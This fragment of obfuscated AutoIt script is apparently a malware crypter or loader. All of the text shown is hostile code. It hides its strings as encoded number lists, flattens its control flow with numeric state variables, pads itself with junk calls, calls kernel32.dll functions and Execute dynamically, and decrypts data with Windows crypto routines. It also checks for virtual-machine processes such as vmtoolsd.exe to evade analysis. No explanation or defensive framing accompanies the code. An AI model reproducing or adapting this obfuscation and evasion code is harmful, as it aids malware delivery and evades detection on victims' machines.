) ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..ern..e..l32.....d..l..l" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..44,..31,27..,..4..6,3..1..,..6,3..5..,..38..,31..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,45..,46,..44" , ".." ) ) , $FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , LUXBZMCWKPOC ("st..ru..ct..*" , ".." ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , "" ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $DBGGPSHIBQGJ ($FILEHANDLE ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $NPTGNKISXCCR ($FILEHANDLE , $BYTES ) $1027989821 = 1203322726 DIM $2CGYKWLYPSNSIE1FFBSM = 1138330 + 4292028284 * 2422679 + 1451894 ISPTR (3910360 * 133122 + 1965520 ) ENDIF INT (3334982 ) NEXT ENDIF ENDFUNC FUNC IRWNOKLXLW () LOCAL $ARRAY = [LUXBZMCWKPOC ("vm..t..oo..ls..d.....exe" , ".." 
) , LUXBZMCWKPOC ("v..b..o..x.ex..e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cUJodtOqAs0Q1peCLdghXZVWVuigmg5qItqyuFfLjy3qnyRWhT62podn9XDSlHdtwIgH8Qig7D8y5DIvNv9DkdaupdyGbwzKuJ3NriY" ) ENDIF IF $116925729 = 92596336 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] -= ZVTZJDNXHRPQQIM ("54" ) ISPTR ("rEnhd0IJjtHWr5qKeKdxevK4eEGH2ujofKW4t4sJbUAJgF13k9VsS2J54tcIsbRYktQRjvrkrDvt5bY" ) $116925729 = 1604509846 ISBINARY ("J0Fma0a91UqacMyWZjUYSKaoFqa3ED4NOYntYCRsvrsHmvrsLcTE4Hk9ZqRT0hEw0Mvnyf8vBACArCbk8SqBVyTgNnEGW7BoW5SJ9d3Gew" ) ENDIF IF $116925729 = 113519199 THEN LOCAL $TTEMPSTRUCT $116925729 = 1027989821 MOD (2055517 , 3023122 ) ENDIF IF $116925729 = 116471326 THEN $VRETURN = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] $116925729 = 1196440215 ENDIF IF $116925729 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28,35,..40..,..27..,..44..,5..1..,4..6..,..4..1,..4..5,..4..6,4..4..,..3..5,40,3..3.." , ".." ) ) ) $116925729 = 1300820860 ENDIF IF $116925729 = 256356752 THEN LOCAL $E = EXECUTE $116925729 = 176683708 ENDIF IF $116925729 = 432319576 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 
("53..,50..,..5..7..,..57,..5..9,3,..5..9,3,5..7,56..,59..,..54..,..5..9..,3,5..9..,..3..,5..5..,..6..1..,..5..5,5..7..,5..8..,..6..,58..,..6..,..5..9..,6..0..,..5..8,..6,59,..5..4,57,..56..,..6..0,5..5..,..60,..62..,..60,5..3,..6..0,..5..7,..5..7,..62..,..5..9,..5,..6..0,5..7..,..59..,..58,..60,..5..5..,5..9,..5..,5..9,..54,5..9..,3,..5..7,57,..59..,54,..60,..57..,5..9..,..54,5..8..,..2..,..55..,..55,..56..,..5..4,55..,5..5,58,..4,..5..5..,3..,5..5..,5..3,..55,..55..,59..,5..5,59..,6,5..9,6..,..5..9..,..3..,..5..5..,5..5..,..5..5,3,..5..5,..53..,..55..,..55..,57,..5..6..,..60..,..5..5,..6..0,62,..60..,53,..6..0,5..7..,5..7..,57,..59,..58..,60..,5..6,..6..0,..57..,..6..0..,5..5,59,6,60,6..2..,5..7,2,5..9..,..5..8..,6..0..,62,5..5..,5..5..,..55,3,55..,5..3..,..55..,..5..5,..5..9..,..61..,..59,54..,59,5,..5..9..,5..7..,..5..9,3..,..59,58,..5..5..,..55..,..55,..3..,..5..5,..5..3..,55..,..5..7,60,59..,5..7,..5..6,..60..,55,..60..,6..2..,..60,5..3..,60,..5..7,..5..7,2..,5..9,58..,6..0,..62..,..55..,..62" , ".." 
) ) ) ) ISPTR ("vpb3FhrqmtxUtqRVDS6MXJE1fvLYuZtfNnfMnQOCjsqOZ4" ) $116925729 = 92596336 CHR (439850 ) ENDIF IF $116925729 = 586524435 THEN LOCAL $A_CALL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50..,..5..7..,..57..,..5..9,3..,59,3,..5..7,56,5..9..,..54,59..,..3,..5..9..,..3..,..5..5..,61..,5..5..,..5..5..,..5..9..,5..,60..,..57,..59..,5..7,..5..9..,3,5..9..,..3..,..5..5..,..5..,59..,..57..,59,3..,59..,..3,..55,55,..5..5,3..,5..5,..53..,5..5,..5..5,..59..,..6..2,59..,5..,60,57,55,55..,..5..5,..3..,..5..5,5..5..,..58..,55,6..0..,5..7,..5..9..,3,..5..7..,..57..,..5..9..,5..8..,59..,..56,59..,6..,59,..4..,..6..0..,..53..,60..,55,..59..,..58..,..6..0..,..56,..6..0,5..6..,..5..7..,..5..5..,60,..58,5..9,5..9,..5..9..,..5..9..,59..,5..8..,..60,55..,..5..5..,..5..5,..5..5,..3..,..5..5..,..5..5,..6..0..,58..,6..0..,56,5..9..,..6..1,..5..9,6,..60,5..5,..60..,5..7..,55,..55..,..5..5..,..3,..5..5,5..3,5..6,..55,55,..3..,..55..,..55,..6..0..,53,60,..5..7,6..0,..5..5..,5..5,55..,55,3,55..,53..,5..7,..57..,59..,..3,..5..9..,..3,..58..,56..,6..0,..57,60..,..5..5,..6..0,..58..,..5..9..,..5..6,..60..,..57,5..7..,6..0..,59..,5..8,..6..0,5..7,..5..8..,..53..,..60,..57..,60,5..5,55,..61,..55,..5..7,6..0,..5..7,5..7..,..55..,..6..0,5..8,..5..9,5..9,..5..9..,..5..9,59..,..58,60..,55,5..5..,62,55,3,5..5,..55..,59..,5..7,60,60,..59..,6,..6..0..,55,..59..,5..7,55,5..5..,..55..,..3,..5..5,5..3..,..5..7,..57..,5..9,..3,5..9..,..3..,58..,..56..,60..,5..7..,..60..,..5..5..,..60,5..8..,..5..9..,..5..6..,..60,5..7..,5..7,..60,59..,..5..8..,60,..57..,5..8..,5..6,..59,..6..2,60..,..1..,5..9..,..58,5..5,61,55..,..5..7,..6..0..,5..7..,..57,..5..5..,..60,..5..8,59,5..9..,59..,..59,59..,..5..8..,..60..,..55,..55..,62,55,3..,55,..5..5..,..60,..53,6..0,57,..60..,5..5,..5..5,5..5,..55,3..,..55,..5..3..,..5..7..,57,..59,3,..59..,..3..,58,..56..,60..,..57,..60,..55..,..60..,..58..,59,5..6..,..6..0..,..5..7,5..7,60,..5..9,58,..6..0..,..5..7..,58..,5..3..,..6..0..,5..7,..6..0,5..5,..5..5..,..61..,..5..5
,..57..,60,57..,57,..62..,5..9..,5,..6..0,53..,..6..0,..58..,..60..,..57,..5..5..,62..,..5..5,..3,..5..5,5..5..,5..9..,..57..,..6..0,6..0..,59,..6,60..,5..5,59..,5..7..,..5..5..,..55..,..5..5..,3,..55,5..3..,5..7,5..7..,5..9..,..3..,..5..9..,..3..,..58..,..56..,..60,57..,60..,5..5..,..60..,..58..,59..,5..6,6..0,..5..7..,57..,..6..0,5..9,5..8..,..60,..5..7..,58,..56..,..5..9..,6..2..,..60,..1..,..5..9,..58..,..55,..6..1,..55..,..5..7,60..,5..7,..57,..6..2,59..,..5,..6..0..,5..3,..6..0,..5..8..,..60..,5..7,..5..5,6..2..,5..5..,..3..,..55,5..5..,..5..9,..5..7..,..60,..60,..5..9,..6,60..,..55,59..,5..7..,55..,1..,..55..,..5..5,5..5..,3..,..5..5..,53..,..5..6,..5..3..,5..5,6..2" , ".." ) ) ) ) ISBOOL (3036564 * 693275 ) $116925729 = 1453481599 RANDOM (1505347 ) ENDIF IF $116925729 = 737653776 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57,..57,5..9,..3,..5..9..,..3,..5..8,..56,..6..0..,..57,..60,5..5,..6..0..,5..8,5..9..,..56..,6..0,..57,58,..5..6..,59..,5..8..,..60..,5..7,57,5..7,..59..,..5..4,6..0,5..7..,..5..9..,54,..5..5,..61..,..55..,..57,60..,..5..7..,57..,55,60..,..58,..59..,..59..,59,..5..9..,..55,3,55,53,5..7,..58..,..6..0,61..,..5..9..,..5..8..,..59,56..,60..,5..8,6..0..,..5..7,5..9,..5..8..,5..5..,6..1..,56..,5..4,5..5..,..6..2..,55..,..3,55..,..53..,..5..5,..5..7,6..0..,..5..9,..5..7,56,..60..,..55,60..,..6..2,..60..,..53..,..60,5..7..,5..7..,2,59..,58..,60,..6..2,55,..62" , ".." 
) ) ) ) $116925729 = 38669117 DIM $CCES0BLSID4XMQ3MS2D2 = "7Qw3NGZ6rQ3NdvrgC5iL1wzb9XblC2lD4IFWhzlEww1wbUi5KG075qMKqv4" ENDIF IF $116925729 = 781366022 THEN LOCAL $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..0..,57,..5..7,5..9..,3,59,..3..,57,..56..,..5..9,5..4,..5..9,3,5..9,3..,5..5,..61,5..5,5..7..,58..,..6,58..,6,5..9..,60..,5..8..,..6..,59..,..5..4..,..57,5..6..,..60..,..5..5,6..0..,..6..2,..60..,..5..3,..6..0,..5..7..,..5..7,6..2,5..9,..5..,6..0..,..57,..5..9,5..8,6..0,5..5,..59,..5..,..5..9..,5..4,5..9,3,57..,5..7..,..59..,54..,6..0,..5..7..,59,..54..,58,2..,..56..,5..4..,..5..8,4..,55..,..3..,55,5..3,..5..5..,..5..5..,59..,5..5..,5..9..,..6..,5..9..,..6..,..59..,3..,..5..5,5..5,5..5..,3,5..5,..5..3..,..5..5..,..55,..57..,56,..60..,55,..6..0..,..62,60..,5..3,..60,..5..7,5..7,5..4,5..9,..5..6..,6..0,54..,..6..0..,58,..5..9,6..2,60,55..,..5..9..,..5..8..,..5..7,5..6..,..59,6..,..5..9,5,..60..,57,..5..9,..5..8,60,..61,..60..,..57..,55..,55,..55,..3,5..5..,..5..3..,..5..5,55,..5..9..,6..1,..5..9..,54..,..59,..5..,59,..57..,59,3,..5..9..,58,..55..,..1..,55..,..5..5,..55..,3..,5..5,..53,..5..6,..5..3..,5..5,3..,..55..,..5..3..,5..5,..5..5..,..6..0..,..5..3..,60..,57..,..6..0,..5..5..,..5..5,5..5,5..5..,3..,55..,5..3..,56,..53..,..55..,3..,..55..,53..,..5..5..,55..,..60,5..3,6..0,57,6..0,..55..,55,..5..5..,5..5..,3,..55,53..,..5..6,..5..3..,55..,3..,55,..53,5..5..,..55..,5..9..,5..7..,..6..0..,..60..,5..9,..6,..6..0..,55..,5..9..,57,55..,..55,..5..5,..3,55,..5..3,..5..6,..5..5,56,57,55,..3,55,5..3,..5..5,..55,59,..57,60,..6..0,59,..6,..6..0,55..,5..9,5..7,..5..5..,5..5..,..5..5,..3..,5..5..,53..,55,..55,5..6..,..5..3..,..60..,..6..1..,..57,..59..,..56..,..53..,56..,53,5..6..,53,56,..53..,5..6,5..3..,..5..6..,53,..5..6,..5..3..,55..,..55..,..5..5,62.." , ".." 
) ) ) ) ISBINARY ("EyUEZE8dTNpEEc9pNgK6coIN65FWEu9U3B2LaNffHWnqbhfn" ) $116925729 = 864731176 ENDIF IF $116925729 = 848901156 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..5..7,..5..9..,..3..,..5..9,3,..57,56..,59..,54..,..5..9,3..,..5..9..,..3,..5..5..,61,..55..,..57..,..58..,6..,5..8..,..6,..5..9..,60..,..58..,6..,..59,..5..4..,5..7,..5..6..,60..,..55,6..0..,..6..2,6..0,..5..3..,6..0,57,..5..7..,62,..59,..5,..6..0..,57..,..59,5..8..,6..0..,55,..5..9,..5,..5..9,..54,59,..3..,5..7,57..,5..9,5..4..,60,..57,..59,5..4,..5..8,..2..,5..6..,..5..4..,5..8..,..4..,..55..,..3..,5..5..,..5..3..,..5..5,55..,5..9..,55..,..5..9..,..6..,..59,6..,..5..9,3,5..5..,5..5..,55,..3..,5..5..,..5..3,..5..5,..5..5..,..5..7..,..56..,..6..0..,..5..5..,..6..0..,..6..2,..6..0..,53,..60,..5..7..,5..7..,..56..,60,5..5,59,..58..,..59,54..,60,..5..7..,..59..,..58..,5..7,61,5..9,54..,60..,..5..6..,..59,6..1..,5..5,..55..,55..,..3..,5..5,53,..5..5,5..5..,..5..9..,6..1..,..5..9,..5..4,59..,..5,..5..9,..5..7..,..59,3,5..9,..58..,..55,55,..5..5,..3..,5..5..,..5..3,55,..5..7..,..5..8,..6..,..58..,..6,..5..9..,..6..0..,58,6,59..,5..4,57..,56..,..6..0,5..5..,..6..0..,62,..6..0,5..3..,..6..0,..57..,..5..7,..6..2..,..5..9,5..,60,..57..,..59..,5..8,60,55,59..,5,..59,..54,5..9,3,57,5..7,..5..9..,..5..4..,60,57..,5..9,..5..4..,..58..,2..,..56..,..55..,5..8,..4,55..,..3..,..5..5..,..5..3,..55,..5..5..,60..,..58..,..5..9,62,5..9..,5,..6..0..,57,..5..5..,55,..5..5,3,5..5,53,..55..,..55..,56..,..53..,6..0,61,..5..6,5..3..,..5..6..,..53,5..6..,53,..5..6..,..5..3,..5..6,..61..,..56..,53,..5..6..,..5..3,56..,5..6,5..5..,5..5,..55..,3..,..55..,53..,..5..5,..5..5..,60..,..53..,6..0..,..57,60..,..5..5..,55..,..55,..55..,3..,..55..,53,..56,5..3,5..5,..3..,..55..,..53..,..5..5..,55,5..9..,57,6..0,..6..0,..5..9,6..,..6..0..,5..5..,..59..,5..7..,55,55,5..5..,..3,5..5,5..3..,5..6,..5..3..,..5..5,3,5..5,..53,..55..,5..5,..5..9,6..1..,59..,54,5..9,..5,..59..,57,5..9..,..3,59..,..5..8..,..55..,1..,55..
,..5..5,55..,3..,5..5..,53..,..56,53,..5..5..,..6..2" , ".." ) ) ) ) $116925729 = 1718368979 ISBOOL (3936637 + 4293346114 ) ENDIF IF $116925729 = 864731176 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("55" ) ] = $ARET [ZVTZJDNXHRPQQIM ("54" ) ] ISBOOL ("wpaaFxpbrLYZsz0hKSwf" ) $116925729 = 1808850186 WINEXISTS ("lgunYMFGc" ) ENDIF IF $116925729 = 954977294 THEN LOCAL $TINPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,57..,..57..,..59,3,59..,..3..,..58..,..56,..6..0..,..57,..60..,5..5,..60,..5..8..,..59,..56..,..60,57..,5..7..,56,..6..0,55..,..59..,5..8,5..9..,5..4,60..,..57..,..5..9..,5..8,55..,..61..,5..5..,..5..5,..59..,..5..5,60..,6..2..,..60,57,59..,..5..8,..5..8,..2,55..,..55..,..5..5,53..,..55..,..5..9..,55..,5..3,5..7..,5..5..,..5..9..,..6..2..,..5..9,..5,..5..9,5..4,..60..,5..5,..6..0,..62,5..7..,..3,..5..9,..58,5..9,..5..,..55..,6..1,5..5,..57,59,..5..5,57..,55..,..59..,..6..2..,..59..,5..,..59,..54..,..60,..55..,..6..0,6..2..,..5..5,62,55..,..53..,..55,5..9..,55,5..3..,55,55..,..58,..4,..55,..5..5..,55,..6..2.." , ".." ) ) ) ) $116925729 = 61093985 ENDIF IF $116925729 = 1027989821 THEN LOCAL $IPLAINTEXTSIZE $116925729 = 1138660241 ENDIF IF $116925729 = 1051260188 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0,..57,..57,..5..9..,3,59,3,5..8,56,6..0..,57,60..,..5..5,6..0..,5..8..,59..,5..6..,..6..0..,5..7,5..7,..56..,..60..,..5..5..,..5..9..,..58..,..5..9..,54..,60,..57,5..9,5..8..,5..5,6..1..,..5..5..,55..,59..,..5..5..,..60..,6..2,6..0,..57,..59..,..58..,..58..,2..,..55..,..55..,..55..,..5..3..,..55..,59,..5..5..,..53..,..57..,5..5..,..5..9..,..62..,..59,5..,..5..9..,5..4..,..6..0..,..55..,60,62,..57..,..3,..5..9..,..58..,5..9..,..5..,55,..6..1..,5..5,5..7..,..60,..5..9..,57,5..6..,..60,5..5..,60..,..6..2..,60,53..,..6..0..,57..,..5..7..,..2,5..9,58..,..6..0..,..62,..55,..6..2..,..55,5..3..,5..5,..59..,55..,53..,5..5..,..55..,..58..,4,5..5,55..,55,62.." , ".." 
) ) ) ) INT (178616 ) $116925729 = 737653776 RANDOM (2170536 ) RANDOM (3316550 ) ENDIF IF $116925729 = 1053930317 THEN LOCAL $TBUFFER = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7,5..7,..5..9..,..3,..59,3,..5..8..,56,60..,57..,..60,..55..,..6..0,5..8..,5..9,..5..6,..60,..5..7..,5..7,5..6,60,..5..5..,59..,..58,..59,..5..4,6..0..,..5..7,..59..,5..8..,..5..5..,6..1..,55,..5..5,5..9..,55,..6..0,..62..,..60..,..57,59,58..,..58,..2..,..5..5,55..,..5..5..,5..3,55,..5..9,..5..5,..5..3,..56,..5..4..,..5..6,..5..9,55..,..53..,..5..5,..1..,..5..5,..5..3,..57,57..,5..9,..3..,..59..,..3,58,..5..6,..6..0,57,60,..55,..60..,58..,..5..9,..56,6..0,57..,..57,6..0..,..59,..5..8..,60,5..7,..5..8..,56,..59..,6..2..,..6..0..,1,..5..9..,58,5..5..,..6..1..,..5..5..,..57..,60,..5..7..,5..7,6..2..,..59,..5..,..6..0,53..,..6..0..,..58,60,5..7,5..5,6..2..,..55,..5..3..,..5..5,59..,55,..53,..5..5..,55..,..58,..4..,..55..,55,..5..5..,62.." , ".." ) ) ) ) $116925729 = 586524435 INT (3174530 ) ENDIF IF $116925729 = 1070530058 THEN $VCRYPTKEY = $VRETURN $116925729 = 39019882 ENDIF IF $116925729 = 1138660241 THEN LOCAL $VRETURN $116925729 = 1924764602 ENDIF IF $116925729 = 1196440215 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC 
("5..3..,50,57..,5..7,59,..3,..5..9,3,57,..5..6,5..9,54..,59..,3,5..9..,3..,55..,61,..55..,..5..7..,..58..,6,5..8..,..6..,59,60..,58,..6..,..59..,5..4,..57..,..5..6,..60..,..55,60,..6..2,6..0..,..5..3..,..60..,57..,..57..,6..2,5..9,..5..,..60..,..57,59..,..5..8..,..60,..55,5..9..,..5..,..59,5..4,..59..,3,5..7,..5..7..,..59..,5..4,60..,5..7,..5..9..,..5..4..,..58,..2..,5..6,5..4..,5..8,..4..,..55,..3,5..5..,..53,..5..5..,5..5..,..5..9,..5..5..,5..9..,6..,..59,..6..,5..9,3..,5..5..,5..5,5..5,..3..,..5..5,..5..3..,55,..55..,..5..7,5..6,60,..55..,..6..0..,6..2..,..60,..53,60,..57..,..57..,..5..7..,..59,..5..8..,..6..0,56,6..0..,5..7..,60,55,59..,6,..6..0,6..2,57..,..6..1..,59..,5..4..,..60,..5..6,..59,61..,..55..,55..,55,3..,5..5..,..5..3,..55..,5..5..,59..,..6..1..,5..9,..54..,59..,5..,..5..9..,5..7,5..9..,..3..,..5..9..,58..,..55,55,..55,3,5..5..,..5..3..,..5..5,..5..7..,..5..9,61..,57..,..56..,6..0,..55,..6..0,..6..2,6..0,..53,6..0..,..5..7..,57..,..6..1,5..9,..54..,..60,..5..6..,5..9,..61..,..55,6..2.." , ".." 
) ) ) ) $116925729 = 1070530058 ISBOOL (2885637 + 2030547 ) ENDIF IF $116925729 = 1203322726 THEN LOCAL $TBUFF $116925729 = 113519199 ENDIF IF $116925729 = 1296565717 THEN $IPLAINTEXTSIZE = $ARET [ZVTZJDNXHRPQQIM ("59" ) ] ISSTRING ("vruZKa8jy4MT8EGQdx8SUdvROeh4wrdYYalnlVhrgv8jKZiKHv" ) $116925729 = 2022545531 ISSTRING (2705437 * 2570680 ) ENDIF IF $116925729 = 1300820860 THEN LOCAL $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("56" ) ] ISPTR ("Y58ssDsqQLxelf06Fwazesot3rHKKydI1tX4kso2HSZ7rnTHtJwQWRVFQNya5ROrIZn2s6Vnii2wDqcQIarbcwWkHqnF4o71dGyB9" ) $116925729 = 1203322726 STRING (597511 + 4291688087 + 4294837104 ) ENDIF IF $116925729 = 1453481599 THEN LOCAL $TOUTPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,5..7..,5..7,5..9..,..3..,..59..,..3..,..58..,56..,..6..0,57,6..0,55,6..0..,5..8,..59,..56,..60..,57..,..57..,5..6,..6..0,5..5..,59,..58..,5..9..,..5..4,60,5..7..,..5..9..,..5..8..,55,..6..1,5..5,..5..5..,5..9..,55..,..60..,6..2..,..6..0,5..7..,..59,5..8..,..58,..2..,55,55..,..55,53..,55..,59..,5..5..,53,..55,..57..,5..9..,5..4..,5..8..,..6..,5..7,56..,..5..9,..54..,..59..,3,..59..,3,5..8..,2,..5..6,59..,58..,..4..,55..,..53..,..55..,59,5..5,..5..3,55..,..55,..5..8,..4,..5..5..,5..5..,55,..3..,5..5,..5..3,57..,5..7..,..59,3..,..5..9..,3,..58..,56,..6..0,..57..,..6..0,..5..5,..60..,5..8,..5..9..,..56..,6..0,57..,57,60..,..5..9..,..5..8,..60,5..7..,..58..,..53,60..,5..7,..60..,55..,..55,..61,..5..5..,..5..7,60..,5..7..,5..7,..55,..60..,58..,59,59,59..,5..9,59,5..8,..60,5..5..,55,6..2..,..55,..62" , ".." 
) ) ) ) WINEXISTS ("NplcdubSpt3kbs61JRRU4m3ZivioY5lXbAzrnz5FnOIZNCXff" ) $116925729 = 1947300206 DIM $UKEAWW4SLX3THGIJ3NNK = "lGoNdkOHcjq4jc16851EntAWoSHtnmA30qINpXtlpkjMLz8drM5TXQG1fCyuMut0Sxe2DmQkKOpdkXjZTDcJrSgjUR" STRING (2269520 * 1234892 * 921537 + 4294581480 ) ENDIF IF $116925729 = 1604509846 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,..5..7,5..7..,5..9..,..3..,..59,3,57,56..,..59..,54..,59..,3,..59,..3..,..55,6..1..,..5..5..,..57,..5..8,..6,5..8,..6..,59,..60,..5..8,..6..,5..9,..54..,57,..5..6,..60..,..55,6..0,62,60,53,6..0..,57..,57,6..2..,..59..,5,60,..5..7..,59..,5..8..,6..0,..5..5..,..59,5,..59,..54..,..5..9..,3..,..5..7..,..5..7..,..5..9..,..5..4..,60..,57,5..9,..54..,5..8..,..2,56..,..5..4..,5..8..,4,..5..5..,3,55..,..53,55..,..5..5..,5..9,5..5,59..,..6..,59..,6,..5..9,..3..,55,..5..5..,55,3,55..,..53..,..55,5..5..,57,56..,..6..0,55,..60,6..2,6..0..,53..,6..0..,5..7,5..8..,5..5,5..9..,..5..8,5..9..,..3..,59..,58..,..5..9,..54..,..60..,56..,..5..9..,5..8..,5..7..,5..6..,5..9,6..,5..9,..5..,..6..0..,57..,..5..9,5..8,60..,61,..6..0..,..5..7,5..5,55..,..55,..3,5..5,..53..,55,5..5..,5..9..,..6..1,..59..,54,59,5,..59..,..57..,..5..9..,3,..5..9,..58,..5..5..,..5..5,..5..5..,..3,..5..5..,..5..3,55..,57..,58..,6,..5..8,6,59,..6..0..,..58,6,..5..9..,..54,..57,5..6..,..6..0..,5..5,..6..0..,6..2..,6..0..,5..3,6..0,..57..,5..7..,..6..2,..5..9,..5,..60..,..5..7,5..9..,..5..8,6..0,5..5,59..,5..,5..9,..54..,..5..9..,3..,..57,..5..7..,59,..5..4..,6..0,57..,5..9..,..5..4..,58..,..2,..56..,5..5..,..5..8,4..,55..,3,..55,..53,..5..5..,..55..,..5..9..,5..7..,60..,6..0..,..59..,..6,6..0,..55..,..59,57,..5..5,55,..5..5,..3,..55,53,..5..6..,53..,..55..,..62" , ".." 
) ) ) ) RANDOM (2988315 ) $116925729 = 2060391673 ENDIF IF $116925729 = 1655436234 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("54" ) ] = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50,..5..7,..5..7,59..,..3,..59,3..,5..7..,6,60..,..53,59,..5..8..,..5..9,5,55,..6..1,5..5..,..55..,..57,..5..4,5..9..,57,..6..0,59..,..59,54..,60,..53,..5..9,..6..2..,56..,..5..6,5..6,..55..,..55,5..,..59,57..,..5..9..,3,..5..9..,..3,..55..,55..,..5..5..,..62.." , ".." ) ) ) ) INT (2325981 ) $116925729 = 781366022 INT (2956702 ) INT (3649111 ) ENDIF IF $116925729 = 1713506615 THEN $VRETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,57..,..55,..59,..6..2,59..,..5,..5..9..,..5..4..,..60..,..55,60,62,57..,..4..,59..,..6..2..,..59,5..7,5..5,..6..1..,5..7,57,5..9,3,59..,3,58..,..5..6..,..6..0..,..57,..6..0,..5..5,6..0,58,59,..5..6..,6..0..,57,..5..7,..6..0,..5..9..,..5..8,..60,5..7..,..5..7,..57,..5..9..,54,..6..0,..57..,..5..9..,54..,5..5..,..6..1..,..5..5..,5..7..,6..0,..57,58..,..57,..59,..58..,..5..9..,..4,6..0,..5..3..,..5..8,56..,6..0,57..,..6..0,55,..6..0..,58,5..9,..5..6..,..60,57,55..,3,55..,5..3..,..57..,5..8,60,6..1..,5..9,..5..8..,..5..9,5..6..,..60..,..5..8,60..,5..7,59..,58..,..55,61,56..,5..4,..5..5,62..,..5..5,6..2..,..5..5..,..3..,55,..5..3..,56,..5..4,..5..5..,..3,5..5,53,55,..57..,59..,62,58,5..3,5..9..,..3..,59,5..4,59..,62..,..59,..5..,..5..8..,5..7..,5..9,5..8,60,..61..,..6..0,57,..58..,56,59,62..,6..0..,1,5..9,..5..8..,..55,..62" , ".." 
) ) ) ) $116925729 = 432319576 ISPTR (378792 + 3473642 * 3705772 ) ENDIF IF $116925729 = 1718368979 THEN $HCRYPTHASH = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] ISBINARY (2326930 * 1028255 + 1037320 + 4291704154 ) $116925729 = 1051260188 ISPTR (3798087 * 3172599 + 4294757372 ) ENDIF IF $116925729 = 1808850186 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] += ZVTZJDNXHRPQQIM ("54" ) DIM $FRYZXG8PUGBZSL2VYA7Q = "Sfh78cQgHJIf6M8m0eSxkr9TENpebaLanvxlRCzesiXGBuwH4IIvp3EAgxCuWKeG7H2JpXExOMebDCqjr" $116925729 = 848901156 CHR (1815563 ) ENDIF IF $116925729 = 1885155689 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,57..,..57..,..5..9,3..,59,..3,..58..,..5..6,..6..0,5..7,6..0,..55,6..0,..5..8,59,56,6..0..,..57..,..5..8,5..6,..5..9,..58,..6..0..,..57,..57,5..7,59..,54..,..6..0,57..,59,5..4,..5..5,61..,5..5..,..5..7,6..0..,..57..,..57,55..,..60..,..58,..5..9..,..59,5..9,..5..9..,5..5,..3,5..5,..5..3,57,..5..8..,6..0..,..6..1,..5..9,58,5..9,..56,6..0..,58..,..6..0..,57,..5..9,5..8..,..5..5..,6..1..,56..,54,5..5,..6..2,..5..5,3..,..55,..53..,55..,..5..7,6..0,..59..,..5..7..,5..7,59..,..54..,6..0,5..7..,..5..9..,54,55,62.." , ".." ) ) ) ) $116925729 = 1970938970 INT (3989727 ) ENDIF IF $116925729 = 1924764602 THEN $VDATA = GLOBALDATA ($VDATA , $RT ) MOD (2283428 , 3605473 ) $116925729 = 1655436234 ENDIF IF $116925729 = 1947300206 THEN RETURN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,..5..7,..57,59..,3,5..9..,..3,58..,5..6,..6..0..,5..7..,60,55,6..0,..5..8,5..9,..56,6..0..,57,..57,60,5..9..,5..8,..60,5..7..,5..7,..57,..59..,54,6..0..,5..7..,..5..9..,54..,..55,6..1,55,5..7..,..6..0,..57,..57..,..6,6..0,58..,..60..,5..7,..6..0,5..3,60..,..5..8..,60..,..5..7..,55..,..3..,..55..,..5..3..,..5..6..,5..4..,55,6..2.." , ".." 
